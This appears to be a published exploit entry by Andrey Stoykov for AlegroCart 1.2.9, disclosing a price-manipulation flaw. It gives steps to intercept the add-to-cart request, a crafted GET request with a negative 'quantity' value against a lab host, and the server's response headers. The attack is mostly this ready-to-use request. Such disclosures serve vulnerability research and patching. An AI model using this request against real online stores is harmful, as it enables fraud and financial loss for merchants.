# Exploit Title: Business Logic Flaw: Price Manipulation - alegrocartv1.2.9 # Date: 04/2025 # Exploit Author: Andrey Stoykov # Version: 1.2.9 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/ Business Logic Flaw: Price Manipulation #1: Steps to Reproduce: 1. Visit the store and add a product 2. Intercept the HTTP GET request and add negative value to the "quantity" parameter // HTTP GET request GET /alegrocart/index.php?controller=addtocart&action=add&item=10&quantity=-100 HTTP/1.1 Host: 192.168.58.129 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 [...] // HTTP response HTTP/1.1 200 OK Date: Thu, 03 Apr 2025 22:16:58 GMT Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3 X-Powered-By: PHP/5.6.40 Cache-Control: max-age=0, private, no-store, no-cache, must-revalidate Expires: Thu, 03 Apr 2025 22:16:58 GMT Vary: Accept-Encoding Content-Length: 813 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8